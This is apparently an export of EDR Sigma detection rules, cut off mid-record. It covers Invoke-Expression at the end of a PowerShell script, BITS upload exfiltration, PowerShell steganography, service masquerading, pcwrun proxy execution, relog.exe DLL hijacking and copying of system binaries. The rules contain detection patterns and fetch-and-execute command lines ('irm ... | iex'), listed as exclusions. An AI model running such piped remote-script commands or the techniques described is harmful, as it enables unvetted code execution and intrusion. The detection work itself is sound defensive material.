"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619824Z",
"creation_date": "2026-03-23T11:45:34.619826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619830Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_ending_iex.yml",
"content": "title: Suspicious PowerShell Script Ending With Invoke-Expression\nid: 82d46a9a-ed34-43b5-b6b3-c0e066ee8b96\ndescription: |\n Detects the execution of a PowerShell script with commands ending in Invoke-Expression.\n Invoke-Expression allows attackers to execute a command passed as an argument. It is often abused by attackers to execute obfuscated or remote code in-memory.\n It is recommended to analyze the content of the script that has been executed to determine its purpose.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/03/15\nmodified: 2025/01/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n # match all variation of spaces but can match anywhere in the script\n ScriptBlockText|re:\n - '\\| *iex'\n - '\\| *invoke-expression'\n # ensure that IEX is the last command of the script\n ScriptBlockText|endswith:\n - 'iex'\n - 'invoke-expression'\n - 'iex;'\n - 'invoke-expression;'\n\n exclusion_download_exec:\n ScriptBlockText|startswith:\n - 'iwr https://get.pnpm.io/install.ps1'\n - 'irm get.scoop.sh'\n - 'irm bun.sh/install.ps1'\n - 'irm https://get.activated.win'\n - 'irm \"https://christitus.com/win'\n - 'irm https://community.chocolatey.org/install.ps1'\n - 'irm https://claude.ai/install.ps1'\n - 'Invoke-WebRequest https://raw.githubusercontent.com/asheroto/winget-installer/master/winget-install.ps1'\n - 'irm christitus.com/win'\n - 'iwr -useb \"https://raw.githubusercontent.com/Win11Modder/Win11-Req-Bypass/main/Win11_Bypass.ps1'\n - 'irm https://deno.land/install.ps1'\n - 'irm https://aspire.dev/install.ps1'\n\n exclusion_oh_my_posh:\n ScriptBlockText|contains:\n - '?:/Users/*/AppData/Local/Programs/oh-my-posh/bin/oh-my-posh.exe'\n - '?:/Program Files (x86)/oh-my-posh/bin/oh-my-posh.exe'\n - '?:/Program 
Files/oh-my-posh/bin/oh-my-posh.exe'\n - 'oh-my-posh init pwsh'\n\n exclusion_servicenow:\n ScriptBlockText|startswith: 'snc-decode-command '\n ProcessParentImage|endswith: '\\bin\\java.exe'\n\n exclusion_chocolatey:\n ScriptBlockText|endswith: 'iwr https://community.chocolatey.org/install.ps1 -UseBasicParsing | iex'\n\n exclusion_connectwise_parent:\n ProcessParentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Connectwise, LLC'\n\n exclusion_connectwise_grandparent:\n ProcessGrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Connectwise, LLC'\n\n exclusion_itsplatform_parent:\n ProcessParentImage: '?:\\program files (x86)\\itsplatform\\plugin\\performance\\platform-performance-plugin.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Connectwise, LLC'\n\n exclusion_itsplatform_grandparent:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ITSPlatform\\agentcore\\platform-agent-core.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Connectwise, LLC'\n\n exclusion_astral_install:\n ScriptBlockText|endswith:\n - 'irm https://astral.sh/uv/install.ps1 | iex'\n - 'irm https://astral.sh/uv/?.?.??/install.ps1 | iex'\n\n exclusion_rstudio:\n ProcessGrandparentImage: '?:\\Program Files\\RStudio\\rstudio.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82d46a9a-ed34-43b5-b6b3-c0e066ee8b96",
"rule_name": "Suspicious PowerShell Script Ending With Invoke-Expression",
"rule_description": "Detects the execution of a PowerShell script with commands ending in Invoke-Expression.\nInvoke-Expression allows attackers to execute a command passed as an argument. It is often abused by attackers to execute obfuscated or remote code in-memory.\nIt is recommended to analyze the content of the script that has been executed to determine its purpose.\n",
"rule_creation_date": "2024-03-15",
"rule_modified_date": "2025-01-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82dfa65b-d6b2-4d2d-a661-450cba3121a1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091702Z",
"creation_date": "2026-03-23T11:45:34.091704Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091709Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/bits-and-bytes-analyzing-bitsloth",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/techniques/T1567/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1197_bits_post.yml",
"content": "title: Suspicious BITS Upload Protocol Usage\nid: 82dfa65b-d6b2-4d2d-a661-450cba3121a1\ndescription: |\n Detects a URL request using the BITS protocol to an IP address or to a non standard port.\n Adversaries may use the BITS protocol to exfiltrate data.\n Windows has a system administration feature called the Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares.\n It is recommended to check the process responsible for the upload job and analyze the impacted computer for other malicious behavior or files.\nreferences:\n - https://www.elastic.co/security-labs/bits-and-bytes-analyzing-bitsloth\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1567/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/08/02\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1197\n - attack.exfiltration\n - attack.t1567\n - attack.command_and_control\n - attack.t1105\n - attack.t1571\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.FileDownload\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlVerb: 'BITS_POST'\n\n selection_ip:\n RequestUrlHost|re: '^([0-9]{1,3}\\.){3}([0-9]{1,3})$'\n\n filter_port:\n RequestUrlPort:\n - '80'\n - '443'\n\n exclusion_ivanti:\n RequestUrl|contains: ':7751/managementserver/Deployment/Events/'\n\n exclusion_ccm:\n RequestUrl|endswith:\n - '/CCM_Incoming/{????????-????-????-????-????????????}'\n - '/CCM_Incoming/%7B????????-????-????-????-????????????%7D'\n\n condition: selection and (not filter_port or selection_ip) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82dfa65b-d6b2-4d2d-a661-450cba3121a1",
"rule_name": "Suspicious BITS Upload Protocol Usage",
"rule_description": "Detects a URL request using the BITS protocol to an IP address or to a non-standard port.\nAdversaries may use the BITS protocol to exfiltrate data.\nWindows has a system administration feature called the Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares.\nIt is recommended to check the process responsible for the upload job and analyze the impacted computer for other malicious behavior or files.\n",
"rule_creation_date": "2024-08-02",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197",
"attack.t1567",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "82f20fc7-b480-4189-a916-5639984934a6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085399Z",
"creation_date": "2026-03-23T11:45:34.085400Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085405Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/peewpw/Invoke-PSImage",
"https://attack.mitre.org/techniques/T1027/003/",
"https://attack.mitre.org/techniques/T1001/002/",
"https://attack.mitre.org/software/S0231/"
],
"name": "t1027_003_powershell_steganography.yml",
"content": "title: Possible Steganography via PowerShell\nid: 82f20fc7-b480-4189-a916-5639984934a6\ndescription: |\n Detects PowerShell execution patterns associated with steganography-based payloads, where malicious code is embedded within image files' pixel data.\n This technique, commonly implemented through tools like Invoke-PSImage, allows attackers to bypass traditional detection by concealing PowerShell scripts within seemingly benign PNG files.\n The malicious payload is typically extracted from the image and executed directly in memory, making traditional file-based detection ineffective.\n It is recommended to investigate PowerShell processes interacting with image files, analyze suspicious image metadata, and perform memory forensics to identify steganography-based code.\nreferences:\n - https://github.com/peewpw/Invoke-PSImage\n - https://attack.mitre.org/techniques/T1027/003/\n - https://attack.mitre.org/techniques/T1001/002/\n - https://attack.mitre.org/software/S0231/\ndate: 2021/11/12\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.003\n - attack.command_and_control\n - attack.t1001.002\n - attack.s0231\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_1:\n PowershellCommand|contains:\n - 'System.Drawing.Bitmap'\n - 'System.Windows.Forms.PictureBox'\n selection_2:\n PowershellCommand|contains|all:\n - 'GetPixel'\n - '[math]::Floor'\n - '-bor'\n - '-band'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "82f20fc7-b480-4189-a916-5639984934a6",
"rule_name": "Possible Steganography via PowerShell",
"rule_description": "Detects PowerShell execution patterns associated with steganography-based payloads, where malicious code is embedded within image files' pixel data.\nThis technique, commonly implemented through tools like Invoke-PSImage, allows attackers to bypass traditional detection by concealing PowerShell scripts within seemingly benign PNG files.\nThe malicious payload is typically extracted from the image and executed directly in memory, making traditional file-based detection ineffective.\nIt is recommended to investigate PowerShell processes interacting with image files, analyze suspicious image metadata, and perform memory forensics to identify steganography-based code.\n",
"rule_creation_date": "2021-11-12",
"rule_modified_date": "2025-01-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1001.002",
"attack.t1027.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "830dba8c-6d84-4973-9940-ee743a5f5105",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622043Z",
"creation_date": "2026-03-23T11:45:34.622045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622050Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1036_005_system_service_masquerade_linux.yml",
"content": "title: System Service Masqueraded\nid: 830dba8c-6d84-4973-9940-ee743a5f5105\ndescription: |\n Detects an execution of a common Linux service from a non-standard directory.\n Adversaries may try to match the name of a legitimate system binary when creating a malicious executable to evade defenses.\n It is recommended to ensure the legitimacy of the process and that it has a legitimate reason to mimic the name of a system service.\nreferences:\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/01/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Masquerading\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_service:\n Image|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n\n filter_system_directories:\n Image|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/sbin/'\n - '/nix/store/*/bin/'\n\n exclusion_sshpass:\n ParentImage: '/usr/bin/sshpass'\n\n exclusion_hurukai:\n ParentImage|endswith: '/hurukai-*/hk'\n\n exclusion_snap_sshd:\n # /snap/core20/2264/usr/sbin/sshd\n Image: '/snap/core*/*/sshd'\n\n exclusion_snap_cupsd:\n # /snap/cups/1058/sbin/cupsd\n Image: '/snap/cups/*/cupsd'\n\n exclusion_strace:\n ParentImage: '/usr/bin/strace'\n\n condition: selection_service and not 1 of filter_* and not 1 of exclusion_*\nlevel: critical\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "830dba8c-6d84-4973-9940-ee743a5f5105",
"rule_name": "System Service Masqueraded",
"rule_description": "Detects an execution of a common Linux service from a non-standard directory.\nAdversaries may try to match the name of a legitimate system binary when creating a malicious executable to evade defenses.\nIt is recommended to ensure the legitimacy of the process and that it has a legitimate reason to mimic the name of a system service.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-01-22",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.005",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8317c88b-c80b-4c89-8af0-851a7ba8f0ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069666Z",
"creation_date": "2026-03-23T11:45:34.069668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069673Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_pwcrun.yml",
"content": "title: Proxy Execution via pcwrun.exe\nid: 8317c88b-c80b-4c89-8af0-851a7ba8f0ee\ndescription: |\n Detects a suspicious execution of the Program Compatibility Wizard (pcwrun.exe) to launch a binary.\n Attackers may abuse pcwrun.exe as a LOLBin to bypass security restrictions.\n It is recommended to analyze the process responsible for the execution of pcwrun.exe as well as to look for suspicious actions by child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/02/04\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Pcwrun\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\pcwrun.exe'\n - OriginalFileName: 'pcwrun.exe'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_pca:\n CommandLine:\n - '?:\\Windows\\System32\\pcwrun.exe ?:\\\\* PCA'\n - '?:\\Windows\\System32\\pcwrun.exe \\\\\\\\* PCA'\n ParentImage:\n - '?:\\Windows\\System32\\taskhostw.exe'\n - '?:\\Windows\\System32\\pcaui.exe'\n\n exclusion_taskmgr:\n CommandLine:\n - '?:\\WINDOWS\\system32\\pcwrun.exe ?:\\\\* CompatTab'\n - '?:\\WINDOWS\\system32\\pcwrun.exe \\\\\\\\* CompatTab'\n ParentImage:\n - '?:\\Windows\\System32\\Taskmgr.exe'\n - '?:\\Windows\\System32\\dllhost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8317c88b-c80b-4c89-8af0-851a7ba8f0ee",
"rule_name": "Proxy Execution via pcwrun.exe",
"rule_description": "Detects a suspicious execution of the Program Compatibility Wizard (pcwrun.exe) to launch a binary.\nAttackers may abuse pcwrun.exe as a LOLBin to bypass security restrictions.\nIt is recommended to analyze the process responsible for the execution of pcwrun.exe as well as to look for suspicious actions by child processes.\n",
"rule_creation_date": "2022-02-04",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8324bb82-ad51-45a4-b7ba-ab3b4f0ef559",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594039Z",
"creation_date": "2026-03-23T11:45:34.594042Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594050Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_relog.yml",
"content": "title: DLL Hijacking via relog.exe\nid: 8324bb82-ad51-45a4-b7ba-ab3b4f0ef559\ndescription: |\n Detects potential Windows DLL Hijacking via relog.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'relog.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\pdh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8324bb82-ad51-45a4-b7ba-ab3b4f0ef559",
"rule_name": "DLL Hijacking via relog.exe",
"rule_description": "Detects potential Windows DLL Hijacking via relog.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "833f7622-fa24-4de8-b6f6-a16318c101c5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.293944Z",
"creation_date": "2026-03-23T11:45:35.293971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.293987Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md",
"https://attack.mitre.org/techniques/T1036/003/"
],
"name": "t1036_003_essential_binary_copy_linux.yml",
"content": "title: Essential Binary Copied\nid: 833f7622-fa24-4de8-b6f6-a16318c101c5\ndescription: |\n Detects the execution of the cp command to copy an essential Linux binary to another location.\n Attackers may rename legitimate system utilities to evade detection mechanisms.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md\n - https://attack.mitre.org/techniques/T1036/003/\ndate: 2022/12/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/cp'\n CommandLine|startswith:\n - 'cp /bin/'\n - 'cp /sbin/'\n - 'cp /usr/bin/'\n - 'cp /usr/sbin/'\n - 'cp -? /bin/'\n - 'cp -? /sbin/'\n - 'cp -? /usr/bin/'\n - 'cp -? /usr/sbin/'\n - 'cp -?? /bin/'\n - 'cp -?? /sbin/'\n - 'cp -?? /usr/bin/'\n - 'cp -?? 
/usr/sbin/'\n ParentImage|contains: '?'\n\n exclusion_rancher:\n - CommandLine: 'cp -l /* /opt/jail/*'\n ParentCommandLine:\n - '/bin/bash /usr/bin/jailer.sh *'\n - 'rancher *'\n - Ancestors|contains|all:\n - '/var/lib/rancher/k3s/'\n - 'containerd-shim-runc'\n\n exclusion_mkinitramfs:\n # cp -pP /bin/kbd_mode /var/tmp/mkinitramfs_2yUr1t//bin/kbd_mode\n # cp -aZ /sbin/modprobe /sbin/rmmod /var/tmp/mkinitramfs_xrTrMR/sbin/\n # cp -pP /usr/bin/plymouth /tmp/tmp.YzmyTjnemx/mkinitramfs_lyrlpn//usr/bin/plymouth\n CommandLine:\n - 'cp -pP /* /var/tmp/mkinitramfs_??????/*'\n - 'cp -a *modprobe *rmmod /var/tmp/mkinitramfs_??????/*'\n - 'cp -aZ */modprobe */rmmod /var/tmp/mkinitramfs_??????/*'\n - 'cp -pP /* /tmp/tmp.??????????/mkinitramfs_??????//usr/*'\n - 'cp -aZ */modprobe */rmmod /tmp/*/mkinitramfs_??????/*'\n\n exclusion_mdadm:\n CommandLine:\n - 'cp -pP /sbin/mdmon /run/initramfs//usr/sbin/mdmon'\n - 'cp -pP /sbin/mdadm /run/initramfs//usr/sbin/mdadm'\n ParentCommandLine:\n - '/bin/sh /usr/share/finalrd/mdadm.finalrd setup'\n - 'run-parts -v --regex=* --arg=setup -- /usr/share/finalrd'\n\n exclusion_iscsi:\n CommandLine: 'cp -pP * /run/initramfs/*'\n ParentCommandLine: '/bin/sh /usr/share/finalrd/open-iscsi.finalrd setup'\n\n exclusion_debootstrap:\n ParentCommandLine|startswith: '/bin/sh /usr/sbin/debootstrap'\n\n exclusion_container:\n - ProcessGrandparentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/var/lib/rancher/rke2/data/*/bin/containerd-shim-runc-v2'\n - '/usr/bin/crio-conmon'\n - Ancestors|contains:\n - '|/usr/bin/dockerd|/usr/lib/systemd/systemd'\n - '|/usr/bin/dockerd|/lib/systemd/systemd'\n - '|/usr/bin/containerd-shim|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|/usr/bin/containerd|'\n - '|/usr/bin/lxc-start|'\n\n exclusion_finalrd:\n CommandLine:\n - 'cp -pP /sbin/kexec /run/initramfs//usr/sbin/kexec'\n - 'cp -pP /usr/sbin/mdadm /run/initramfs//usr/sbin/mdadm'\n - 'cp -pP /usr/sbin/mdmon 
/run/initramfs//usr/sbin/mdmon'\n - 'cp -pP /usr/sbin/kexec /run/initramfs//usr/sbin/kexec'\n Ancestors: '/usr/bin/dash|/usr/bin/run-parts|/usr/bin/dash|/usr/lib/systemd/systemd'\n\n exclusion_apt:\n Ancestors|contains:\n - '|/usr/bin/apt|'\n - '|/usr/bin/apt-get|'\n\n exclusion_initramfs:\n ProcessGrandparentCommandLine|startswith: '/bin/sh /usr/sbin/mkinitramfs -o'\n ProcessParentCommandLine|contains: '/usr/share/initramfs-tools/'\n\n exclusion_aws:\n Ancestors|contains: '|/usr/bin/dash|/var/lib/aws-replication-agent/install_agent|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "833f7622-fa24-4de8-b6f6-a16318c101c5",
"rule_name": "Essential Binary Copied",
"rule_description": "Detects the execution of the cp command to copy an essential Linux binary to another location.\nAttackers may rename legitimate system utilities to evade detection mechanisms.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.003"
